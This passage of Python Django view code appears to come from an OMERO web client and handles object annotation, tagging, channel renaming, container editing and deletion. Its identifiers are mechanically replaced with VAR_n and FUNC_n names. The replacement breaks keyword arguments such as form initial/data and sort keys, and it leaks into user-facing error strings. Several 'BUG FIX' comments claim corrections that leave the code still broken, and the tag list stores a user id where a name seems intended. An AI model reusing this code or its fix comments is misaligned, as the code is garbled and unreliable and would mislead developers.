        ("acquisition", "acquisitions"),
        ("well", "wells"),
        ("share", "shares"),
    )
    return {plural: params.getlist(single) for single, plural in key_map}
@login_required()
@render_response()
def FUNC_45(VAR_2, VAR_6=None, **VAR_7):
    """Build the batch-annotate panel context for multiple selected objects.

    Collects the selected objects from the request, checks annotate
    permissions and group membership, and returns the template context.
    Annotation is blocked (with a message) if the user lacks permission on
    any object or the objects span more than one group.
    """
    VAR_143 = FUNC_43(VAR_2, VAR_6)
    VAR_144 = []  # "type=id" strings for every selected object
    VAR_145 = []  # display labels: {"type", "id", "name"}
    VAR_146 = set()  # distinct group ids across all selected objects
    VAR_147 = False  # becomes a message string if annotation is not allowed
    for VAR_312 in VAR_143:
        VAR_144 += ["%s=%s" % (VAR_312, o.id) for o in VAR_143[VAR_312]]
        for o in VAR_143[VAR_312]:
            VAR_146.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                VAR_147 = (
                    "Can't add annotations because you don't" " have permissions"
                )
            VAR_145.append({"type": VAR_312.title(), "id": o.id, "name": o.getName()})
    # Query-string and link-id forms of the selection, used by the template.
    VAR_148 = "&".join(VAR_144)
    VAR_149 = "|".join(VAR_144).replace("=", "-")
    if len(VAR_146) == 0:
        # Nothing resolved: tags can't be batch-annotated; anything else is
        # an internal error.
        if (
            len(VAR_2.GET.getlist("tag")) > 0
            or len(VAR_2.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate VAR_164</h2>")
        else:
            return handlerInternalError(VAR_2, "No objects found")
    # Switch the service context to (one of) the objects' group.
    VAR_150 = list(VAR_146)[0]
    VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_150)
    VAR_104 = BaseContainer(VAR_6)
    VAR_117 = VAR_104.listFigureScripts(VAR_143)
    VAR_151 = VAR_104.canExportAsJpg(VAR_2, VAR_143)
    VAR_152 = None  # combined fileset + archived-files info for images
    VAR_153 = []
    if "image" in VAR_143 and len(VAR_143["image"]) > 0:
        VAR_153 = [VAR_320.getId() for VAR_320 in VAR_143["image"]]
    if len(VAR_153) > 0:
        VAR_152 = VAR_6.getFilesetFilesInfo(VAR_153)
        VAR_283 = VAR_6.getArchivedFilesInfo(VAR_153)
        VAR_152["count"] += VAR_283["count"]
        VAR_152["size"] += VAR_283["size"]
    VAR_53 = {
        "iids": VAR_153,
        "obj_string": VAR_148,
        "link_string": VAR_149,
        "obj_labels": VAR_145,
        "batch_ann": True,
        "figScripts": VAR_117,
        "canExportAsJpg": VAR_151,
        "filesetInfo": VAR_152,
        "annotationBlocked": VAR_147,
        "differentGroups": False,
    }
    if len(VAR_146) > 1:
        # Cross-group selection: annotation is not possible.
        VAR_53["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        VAR_53["differentGroups"] = True  # E.g. don't run VAR_203 etc
    VAR_53["canDownload"] = VAR_104.canDownload(VAR_143)
    VAR_53["template"] = "webclient/annotations/FUNC_45.html"
    VAR_53["webclient_path"] = VAR_352("webindex")
    VAR_53["annotationCounts"] = VAR_104.getBatchAnnotationCounts(
        FUNC_43(VAR_2, VAR_6)
    )
    return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_6=None, **VAR_7):
    """Show (GET) or save (POST) file annotations for the selected objects.

    GET returns the files form pre-populated with files already linked to
    the selection; POST links chosen existing files and/or uploads a new
    annotation file, returning the ids as JSON.
    """
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    # Use the group of the first selected object for all service calls.
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
    if VAR_155 == 0:
        raise Http404("Need to specify objects via e.g. ?VAR_142=1")
    VAR_104 = None
    if VAR_155 == 1:
        for VAR_433 in VAR_114:
            if len(VAR_114[VAR_433]) > 0:
                VAR_28 = VAR_433[:-1]  # "images" -> "image"
                VAR_29 = VAR_114[VAR_433][0]
                break
        if VAR_28 in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if VAR_28 == "tagset":
                VAR_28 = "tag"
        VAR_94 = {}
        if VAR_28 is not None and int(VAR_29) > 0:
            VAR_94[VAR_347(VAR_28)] = int(VAR_29)
        try:
            VAR_104 = BaseContainer(VAR_6, **VAR_94)
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
    if VAR_104 is not None:
        VAR_284 = VAR_104.getFilesByObject()
    else:
        VAR_104 = BaseContainer(VAR_6)
        for VAR_215, VAR_143 in VAR_154.items():
            if len(VAR_143) > 0:
                VAR_284 = VAR_104.getFilesByObject(
                    VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
                )
                break
    VAR_115["files"] = VAR_284
    if VAR_2.method == "POST":
        # BUG FIX: was "VAR_115=initial" — "initial" is an undefined name
        # (NameError); the initial-data dict is the local VAR_115.
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        if VAR_285.is_valid():
            VAR_284 = VAR_285.cleaned_data["files"]
            VAR_355 = []
            if VAR_284 is not None and len(VAR_284) > 0:
                VAR_355 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
            VAR_234 = (
                "annotation_file" in VAR_2.FILES
                and VAR_2.FILES["annotation_file"]
                or None
            )
            if VAR_234 is not None and VAR_234 != "":
                VAR_399 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
                VAR_355.append(VAR_399)
            return JsonResponse({"fileIds": VAR_355})
        else:
            return HttpResponse(VAR_285.errors)
    else:
        # BUG FIX: same undefined "initial" as above.
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115)
    VAR_53 = {"form_file": VAR_285}
    VAR_54 = "webclient/annotations/files_form.html"
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_6=None, **VAR_7):
    """Apply the posted rating to every object selected in the request."""
    if VAR_2.method != "POST":
        raise Http404("Only POST supported")
    rating = getIntOrDefault(VAR_2, "rating", 0)
    for selected in FUNC_43(VAR_2, VAR_6).values():
        for obj in selected:
            obj.setRating(rating)
    return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_6=None, **VAR_7):
    """Create a comment annotation on the selected objects (or on a share).

    POST only. Share comments also get a link back to the public share URL.
    """
    if VAR_2.method != "POST":
        raise Http404("Unbound instance of VAR_22 not available.")
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
        "shares": VAR_154["share"],
    }
    if len(VAR_154["share"]) < 1:
        # Not a share comment: use the group of the first selected object.
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    # BUG FIX: was "VAR_115=initial" — "initial" is an undefined name
    # (NameError); the initial-data dict is the local VAR_115.
    VAR_157 = CommentAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
    if VAR_157.is_valid():
        VAR_286 = VAR_157.cleaned_data["comment"]
        if VAR_286 is not None and VAR_286 != "":
            if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
                VAR_400 = VAR_154["share"][0].id
                VAR_104 = BaseShare(VAR_6, VAR_400)
                # Link back to the public share page, including the server id.
                VAR_401 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_352("load_template", args=["public"])
                    ),
                    int(VAR_6.server_id),
                )
                VAR_402 = VAR_104.addComment(VAR_401, VAR_286)
                VAR_53 = {
                    "tann": VAR_402,
                    "added_by": VAR_6.getUserId(),
                    "template": "webclient/annotations/comment.html",
                }
            else:
                VAR_104 = BaseContainer(VAR_6)
                VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
                VAR_53 = {"annId": VAR_34, "added_by": VAR_6.getUserId()}
            return VAR_53
    else:
        return HttpResponse(VAR_347(VAR_157.errors))
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_6=None, **VAR_7):
    """Create, update, or delete map annotations on the selected objects.

    POST only. With no annIds and non-empty data, creates annotation(s) —
    duplicated per object for client map annotations, otherwise shared.
    With annIds, updates each annotation's value, or deletes it when the
    posted data is empty.
    """
    if VAR_2.method != "POST":
        raise Http404(
            "Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
        )
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    if len(VAR_154["share"]) < 1:
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    VAR_158 = VAR_2.POST.get("mapAnnotation")
    VAR_158 = json.loads(VAR_158)
    VAR_159 = VAR_2.POST.getlist("annId")
    VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    if len(VAR_159) == 0 and len(VAR_158) > 0:
        VAR_287 = VAR_2.POST.get("duplicate", "false")
        # BUG FIX: the comparison result was discarded, leaving VAR_287 a
        # (always-truthy) string, so "duplicate" was effectively always on.
        VAR_287 = VAR_287.lower() == "true"
        if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            # Client map annotations ("key-value pairs") are always one-per-object.
            VAR_287 = True
        if VAR_287:
            for VAR_415, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
                    VAR_180.setValue(VAR_158)
                    VAR_180.setNs(VAR_90)
                    VAR_180.save()
                    VAR_159.append(VAR_180.getId())
                    VAR_38.linkAnnotation(VAR_180)
        else:
            # Single annotation linked to every selected object.
            VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_6)
            VAR_180.setValue(VAR_158)
            VAR_180.setNs(VAR_90)
            VAR_180.save()
            VAR_159.append(VAR_180.getId())
            for VAR_415, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_38.linkAnnotation(VAR_180)
    else:
        for VAR_34 in VAR_159:
            VAR_180 = VAR_6.getObject("MapAnnotation", VAR_34)
            if VAR_180 is None:
                continue
            if len(VAR_158) > 0:
                VAR_180.setValue(VAR_158)
                VAR_180.save()
            else:
                # Empty data means: delete the annotation.
                VAR_84 = VAR_6.deleteObjects("/Annotation", [VAR_34])
                try:
                    VAR_6._waitOnCmd(VAR_84)
                finally:
                    VAR_84.close()
        if len(VAR_158) == 0:
            VAR_159 = None
    return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_6=None, **VAR_7):
    """Return tag data as JSON, in one of several 'jsonmode' formats:
    tagcount, tags (flat list), desc (descriptions), or owners.
    """
    VAR_101 = FUNC_0(VAR_2, "group", -1)
    VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_347(VAR_101))
    try:
        VAR_177 = int(VAR_2.GET.get("offset"))
        VAR_88 = int(VAR_2.GET.get("limit", 1000))
    except Exception:
        # Missing/invalid paging params: load everything.
        VAR_177 = VAR_88 = None
    VAR_160 = VAR_2.GET.get("jsonmode")
    if VAR_160 == "tagcount":
        VAR_288 = VAR_6.getTagCount()
        # BUG FIX: was "dict(VAR_288=tag_count)" — "tag_count" is an
        # undefined name; the count local is VAR_288.
        return dict(VAR_288=VAR_288)
    VAR_104 = BaseContainer(VAR_6)
    # BUG FIX: was "VAR_177=offset, VAR_88=limit" — both values were
    # undefined names; the locals are VAR_177 and VAR_88.
    VAR_104.loadTagsRecursive(eid=-1, VAR_177=VAR_177, VAR_88=VAR_88)
    VAR_161 = VAR_104.tags_recursive
    VAR_162 = VAR_104.tags_recursive_owners
    if VAR_160 == "tags":
        VAR_71 = list((VAR_320, VAR_433, o, s) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
        return VAR_71
    elif VAR_160 == "desc":
        return dict((VAR_320, VAR_364) for VAR_320, VAR_364, VAR_433, o, s in VAR_161)
    elif VAR_160 == "owners":
        return VAR_162
    return HttpResponse()
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_6=None, **VAR_7):
    """Show (GET) or save (POST) tag annotations for the selected objects.

    GET returns the tags form with the currently-linked tags pre-selected;
    POST links newly-chosen tags, creates any new tags, and unlinks the
    user's tags that were deselected, returning the ids as JSON.
    """
    VAR_154 = FUNC_43(VAR_2, VAR_6)
    VAR_114 = FUNC_44(VAR_2)
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
    VAR_104 = None
    VAR_163 = VAR_6.getEventContext().userId
    VAR_164 = []
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_6.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_165, VAR_166 = tree.marshal_annotations(
        VAR_6,
        VAR_44=VAR_114["projects"],
        VAR_45=VAR_114["datasets"],
        VAR_46=VAR_114["images"],
        VAR_47=VAR_114["screens"],
        VAR_48=VAR_114["plates"],
        VAR_85=VAR_114["acquisitions"],
        VAR_86=VAR_114["wells"],
        VAR_89="tag",
        VAR_88=VAR_1,
    )
    VAR_167 = {}
    for VAR_232 in VAR_166:
        VAR_167[VAR_232["id"]] = VAR_232
    if VAR_155 > 1:
        # Multiple objects selected: keep only tags the current user has
        # linked to EVERY selected object.
        VAR_289 = {}
        for VAR_433 in VAR_165:
            VAR_356 = VAR_433["id"]
            if VAR_356 not in VAR_289:
                VAR_289[VAR_356] = 0
            if VAR_433["link"]["owner"]["id"] == VAR_163:
                VAR_289[VAR_356] += 1
        VAR_165 = [VAR_433 for VAR_433 in VAR_165 if VAR_289[VAR_433["id"]] == VAR_155]
    VAR_168 = []
    for tag in VAR_165:
        VAR_290 = tag["link"]["owner"]["id"]
        VAR_103 = VAR_167[VAR_290]
        VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
        VAR_292 = True
        VAR_293 = tag["link"]["date"]
        VAR_294 = VAR_290 == VAR_163
        VAR_168.append(
            (tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
        )
    VAR_168.sort(VAR_312=lambda x: x[0])
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    if VAR_2.method == "POST":
        # BUG FIX: was "VAR_115=initial" — "initial" is an undefined name
        # (NameError); the initial-data dict is the local VAR_115.
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        VAR_296 = NewTagsAnnotationFormSet(
            prefix="newtags", VAR_158=VAR_2.POST.copy()
        )
        if VAR_295.is_valid() and VAR_296.is_valid():
            # Diff the user's currently-linked tags against the submission.
            VAR_357 = [stag[0] for stag in VAR_168 if stag[5]]
            VAR_357 = list(set(VAR_357))
            VAR_358 = list(VAR_295.cleaned_data["tags"])
            VAR_164 = [tag for tag in VAR_358 if tag not in VAR_357]
            VAR_359 = [tag for tag in VAR_357 if tag not in VAR_358]
            VAR_104 = BaseContainer(VAR_6)
            if VAR_164:
                VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
            VAR_360 = []
            for VAR_22 in VAR_296.forms:
                VAR_360.append(
                    VAR_104.createTagAnnotations(
                        VAR_22.cleaned_data["tag"],
                        VAR_22.cleaned_data["description"],
                        VAR_154,
                        tag_group_id=VAR_22.cleaned_data["tagset"],
                    )
                )
            for remove in VAR_359:
                VAR_403 = BaseContainer(VAR_6, tag=remove)
                VAR_403.remove(
                    [
                        "%s-%s" % (VAR_215, VAR_38.id)
                        for VAR_215, VAR_143 in VAR_154.items()
                        for VAR_38 in VAR_143
                    ],
                    tag_owner_id=VAR_163,
                )
            return JsonResponse({"added": VAR_164, "removed": VAR_359, "new": VAR_360})
        else:
            return HttpResponse(VAR_347(VAR_295.errors))
    else:
        # BUG FIX: same undefined "initial" as above.
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115)
        VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
    VAR_53 = {
        "form_tags": VAR_295,
        "newtags_formset": VAR_296,
        "selected_tags": VAR_168,
    }
    VAR_54 = "webclient/annotations/tags_form.html"
    VAR_53["template"] = VAR_54
    return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_52(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Save posted channel names for an image.

    With "confirm_apply", applies the names to sibling images under the
    posted parent (dataset/plate); otherwise just to this image.
    """
    VAR_142 = VAR_6.getObject("Image", VAR_26)
    VAR_169 = VAR_142.getSizeC()
    VAR_170 = {}
    VAR_171 = {}
    for VAR_320 in range(VAR_169):
        VAR_297 = VAR_2.POST.get("channel%d" % VAR_320, None)
        if VAR_297 is not None:
            VAR_297 = smart_str(VAR_297)[:255]  # Truncate to fit in DB
            VAR_170["channel%d" % VAR_320] = VAR_297
            VAR_171[VAR_320 + 1] = VAR_297
    # BUG FIX: initialise the update-counts so a "confirm_apply" POST with
    # no parentId falls through to the error branch instead of raising
    # UnboundLocalError below.
    VAR_299 = None
    if VAR_2.POST.get("confirm_apply", None) is not None:
        VAR_298 = VAR_2.POST.get("parentId", None)
        if VAR_298 is not None:
            # parentId is e.g. "dataset-123".
            VAR_255 = VAR_298.split("-")[0].title()
            VAR_361 = VAR_241(VAR_298.split("-")[1])
            VAR_299 = VAR_6.setChannelNames(VAR_255, [VAR_361], VAR_171, channelCount=VAR_169)
    else:
        VAR_299 = VAR_6.setChannelNames("Image", [VAR_142.getId()], VAR_171)
    VAR_172 = {"channelNames": VAR_170}
    if VAR_299:
        VAR_172["imageCount"] = VAR_299["imageCount"]
        VAR_172["updateCount"] = VAR_299["updateCount"]
        return VAR_172
    else:
        return {"error": "No VAR_413 found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def FUNC_53(
    VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_6=None, **VAR_7
):
    """Dispatch container-management actions (VAR_27) on an object.

    Supported actions: addnewcontainer, edit/save (shares), editname /
    savename, editdescription / savedescription, remove, removefromshare,
    delete, deletemany. Most actions return JSON; edit actions return a
    template context.
    """
    VAR_54 = None
    VAR_104 = None
    if VAR_28 in (
        "dataset",
        "project",
        "image",
        "screen",
        "plate",
        "acquisition",
        "well",
        "comment",
        "file",
        "tag",
        "tagset",
    ):
        VAR_94 = {}
        if VAR_28 is not None and int(VAR_29) > 0:
            VAR_29 = int(VAR_29)
            VAR_94[VAR_347(VAR_28)] = VAR_29
        try:
            VAR_104 = BaseContainer(VAR_6, **VAR_94)
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
    elif VAR_28 in ("share", "sharecomment", "chat"):
        VAR_104 = BaseShare(VAR_6, VAR_29)
    else:
        VAR_104 = BaseContainer(VAR_6)
    VAR_22 = None
    if VAR_27 == "addnewcontainer":
        if not VAR_2.method == "POST":
            return JsonResponse(
                {"Error": "Must use POST to create container"}, VAR_315=405
            )
        VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
        if VAR_22.is_valid():
            VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_347(VAR_22.cleaned_data)))
            VAR_3 = VAR_22.cleaned_data["name"]
            VAR_362 = VAR_22.cleaned_data["description"]
            VAR_103 = VAR_22.cleaned_data["owner"]
            # BUG FIX (here and below): keyword values were the undefined
            # name "owner" (NameError); the owner local is VAR_103.
            if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
                VAR_40 = VAR_104.createDataset(VAR_3, VAR_362, VAR_103=VAR_103)
            elif VAR_28 == "tagset" and VAR_29 > 0:
                VAR_40 = VAR_104.createTag(VAR_3, VAR_362, VAR_103=VAR_103)
            elif VAR_2.POST.get("folder_type") in (
                "project",
                "screen",
                "dataset",
                "tag",
                "tagset",
            ):
                VAR_441 = VAR_2.POST.get("folder_type")
                if VAR_441 == "dataset":
                    VAR_40 = VAR_104.createDataset(
                        VAR_3,
                        VAR_362,
                        VAR_103=VAR_103,
                        img_ids=VAR_2.POST.getlist("image", None),
                    )
                else:
                    VAR_40 = VAR_6.createContainer(
                        VAR_441, VAR_3, VAR_362, VAR_103=VAR_103
                    )
            else:
                return HttpResponseServerError("Object does not exist")
            VAR_363 = {"bad": "false", "id": VAR_40}
            return JsonResponse(VAR_363)
        else:
            VAR_364 = dict()
            for e in VAR_22.errors.items():
                VAR_364.update({e[0]: unicode(e[1])})
            VAR_363 = {"bad": "true", "errs": VAR_364}
            return JsonResponse(VAR_363)
    elif VAR_27 == "edit":
        if VAR_29 is None:
            raise Http404("No share ID")
        if VAR_28 == "share" and int(VAR_29) > 0:
            VAR_54 = "webclient/public/share_form.html"
            VAR_104.getMembers(VAR_29)
            VAR_104.getComments(VAR_29)
            VAR_404 = list(VAR_6.getExperimenters())
            VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
            VAR_115 = {
                "message": VAR_104.share.message,
                "expiration": "",
                "shareMembers": VAR_104.membersInShare,
                "enable": VAR_104.share.active,
                "experimenters": VAR_404,
            }
            if VAR_104.share.getExpireDate() is not None:
                VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
                    "%Y-%m-%d"
                )
            # BUG FIX: was "VAR_115=initial" — "initial" is an undefined
            # name; the initial-data dict is the local VAR_115.
            VAR_22 = ShareForm(VAR_115=VAR_115)  # 'guests':share.guestsInShare,
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
    elif VAR_27 == "save":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if VAR_28 == "share":
            VAR_404 = list(VAR_6.getExperimenters())
            VAR_404.sort(VAR_312=lambda x: x.getOmeName().lower())
            VAR_22 = ShareForm(
                VAR_115={"experimenters": VAR_404}, VAR_158=VAR_2.POST.copy()
            )
            if VAR_22.is_valid():
                VAR_0.debug("Update share: %s" % (VAR_347(VAR_22.cleaned_data)))
                VAR_382 = VAR_22.cleaned_data["message"]
                VAR_442 = VAR_22.cleaned_data["expiration"]
                VAR_64 = VAR_22.cleaned_data["members"]
                VAR_443 = VAR_22.cleaned_data["enable"]
                VAR_401 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_352("load_template", args=["public"])
                    ),
                    int(VAR_6.server_id),
                )
                VAR_104.updateShareOrDiscussion(
                    VAR_401, VAR_382, VAR_64, VAR_443, VAR_442
                )
                VAR_71 = "enable" if VAR_443 else "disable"
                return HttpResponse(VAR_71)
            else:
                VAR_54 = "webclient/public/share_form.html"
                VAR_53 = {"share": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editname":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            if VAR_28 == "tag":
                VAR_445 = VAR_38.textValue
            else:
                VAR_445 = VAR_38.getName()
            VAR_22 = ContainerNameForm(VAR_115={"name": VAR_445})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savename":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
                VAR_3 = VAR_22.cleaned_data["name"]
                VAR_363 = {"bad": "false", "o_type": VAR_28}
                VAR_104.updateName(VAR_28, VAR_3)
                return JsonResponse(VAR_363)
            else:
                VAR_364 = dict()
                for e in VAR_22.errors.items():
                    VAR_364.update({e[0]: unicode(e[1])})
                VAR_363 = {"bad": "true", "errs": VAR_364}
                return JsonResponse(VAR_363)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editdescription":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savedescription":
        if not VAR_2.method == "POST":
            return HttpResponseServerError(
                "Action '%s' on the '%s' id:%s cannot be complited"
                % (VAR_27, VAR_28, VAR_29)
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
                VAR_362 = VAR_22.cleaned_data["description"]
                VAR_104.updateDescription(VAR_28, VAR_362)
                VAR_363 = {"bad": "false"}
                return JsonResponse(VAR_363)
            else:
                VAR_364 = dict()
                for e in VAR_22.errors.items():
                    VAR_364.update({e[0]: unicode(e[1])})
                VAR_363 = {"bad": "true", "errs": VAR_364}
                return JsonResponse(VAR_363)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "remove":
        VAR_82 = VAR_2.POST["parent"]
        try:
            VAR_104.remove(VAR_82.split("|"))
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_363 = {"bad": "true", "errs": VAR_347(x)}
            return JsonResponse(VAR_363)
        # BUG FIX: the success dict was assigned to the stale name "rdict"
        # while the undefined/stale VAR_363 was returned.
        VAR_363 = {"bad": "false"}
        return JsonResponse(VAR_363)
    elif VAR_27 == "removefromshare":
        VAR_256 = VAR_2.POST.get("source")
        try:
            VAR_104.removeImage(VAR_256)
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_363 = {"bad": "true", "errs": VAR_347(x)}
            return JsonResponse(VAR_363)
        # BUG FIX: same stale "rdict" assignment as in "remove" above.
        VAR_363 = {"bad": "false"}
        return JsonResponse(VAR_363)
    elif VAR_27 == "delete":
        VAR_455 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        try:
            VAR_84 = VAR_104.deleteItem(VAR_455, VAR_91)
            VAR_2.session["callback"][VAR_347(VAR_84)] = {
                "job_type": "delete",
                "delmany": False,
                "did": VAR_29,
                "dtype": VAR_28,
                "status": "in progress",
                "error": 0,
                "dreport": _formatReport(VAR_84),
                "start_time": datetime.datetime.now(),
            }
            VAR_2.session.modified = True
        except Exception as x:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
            )
            VAR_363 = {"bad": "true", "errs": VAR_347(x)}
        else:
            VAR_363 = {"bad": "false"}
        return JsonResponse(VAR_363)
    elif VAR_27 == "deletemany":
        VAR_457 = {
            "Image": VAR_2.POST.getlist("image"),
            "Dataset": VAR_2.POST.getlist("dataset"),
            "Project": VAR_2.POST.getlist("project"),
            "Annotation": VAR_2.POST.getlist("tag"),
            "Screen": VAR_2.POST.getlist("screen"),
            "Plate": VAR_2.POST.getlist("plate"),
            "Well": VAR_2.POST.getlist("well"),
            "PlateAcquisition": VAR_2.POST.getlist("acquisition"),
        }
        VAR_455 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        VAR_0.debug(
            "Delete many: VAR_455? %s VAR_91? %s VAR_457 %s" % (VAR_455, VAR_91, VAR_457)
        )
        try:
            for VAR_312, VAR_187 in VAR_457.items():
                if VAR_187 is not None and len(VAR_187) > 0:
                    VAR_84 = VAR_104.deleteObjects(VAR_312, VAR_187, VAR_455, VAR_91)
                    if VAR_312 == "PlateAcquisition":
                        VAR_312 = "Plate Run"  # for nicer user VAR_382
                    VAR_459 = {
                        "job_type": "delete",
                        "start_time": datetime.datetime.now(),
                        "status": "in progress",
                        "error": 0,
                        "dreport": _formatReport(VAR_84),
                        "dtype": VAR_312,
                    }
                    if len(VAR_187) > 1:
                        VAR_459["delmany"] = len(VAR_187)
                        VAR_459["did"] = VAR_187
                    else:
                        VAR_459["delmany"] = False
                        VAR_459["did"] = VAR_187[0]
                    VAR_2.session["callback"][VAR_347(VAR_84)] = VAR_459
            VAR_2.session.modified = True
        except Exception:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_312}, exc_info=True
            )
            raise
        else:
            VAR_363 = {"bad": "false"}
        return JsonResponse(VAR_363)
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_54(VAR_2, VAR_30, VAR_31=False, VAR_6=None, **VAR_7):
    """Stream an OriginalFile's contents, optionally as an attachment.

    The response cleans up the connection itself (ConnCleaningHttpResponse),
    hence doConnectionCleanup=False on the decorator.
    """
    VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
    VAR_173 = VAR_6.getObject("OriginalFile", VAR_30)
    if VAR_173 is None:
        return handlerInternalError(
            VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
